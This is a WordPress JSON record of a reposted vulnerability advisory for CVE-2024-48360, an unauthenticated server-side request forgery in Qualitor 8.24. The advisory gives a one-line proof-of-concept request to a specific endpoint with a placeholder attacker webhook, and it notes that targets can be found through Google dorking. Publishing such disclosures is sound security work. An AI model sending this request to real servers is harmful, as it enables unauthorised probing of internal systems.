{"id":60028,"date":"2024-10-31T17:43:56","date_gmt":"2024-10-31T14:43:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182427\/qualitor824-ssrf.txt"},"modified":"2024-10-31T17:43:56","modified_gmt":"2024-10-31T14:43:56","slug":"qualitor-8-24-server-side-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/qualitor-8-24-server-side-request-forgery\/","title":{"rendered":"Qualitor 8.24 Server-Side Request Forgery"},"content":{"rendered":"<p># CVE-2024-48360 | Qualitor &lt;= v8.24 Unauthenticated SSRF<\/p>\n<p>## Description<\/p>\n<p>Qualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking.<\/p>\n<p>Our team identified a vulnerability in the application susceptible to SSRF, which allows enumerate internal systems\/ports.<\/p>\n<p>## Proof of Concept (POC)<\/p>\n<p>Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component \/request\/viewValidacao.php.<\/p>\n<p>To exploit, just send a request to host.com\/html\/ad\/adformmobile\/request\/viewValidacao.php?url=ATTACKER_WEBHOOK, you will receive the request from vulnerable server.<\/p>\n<p>![image](https:\/\/github.com\/user-attachments\/assets\/c7f3dd6f-759d-430c-a135-fdc01e802619)<\/p>\n<p>### Researches<\/p>\n<p>https:\/\/www.linkedin.com\/in\/xvinicius\/<\/p>\n<p>&#8211; OpenXP Research Team<\/p>\n","protected":false},"excerpt":{"rendered":"<p># CVE-2024-48360 | Qualitor &lt;= v8.24 Unauthenticated SSRF ## Description Qualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking. Our team identified a vulnerability in the application susceptible to SSRF, which allows enumerate internal systems\/ports. ## Proof &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60028","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60028","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60028"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60028\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60028"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60028"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60028"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}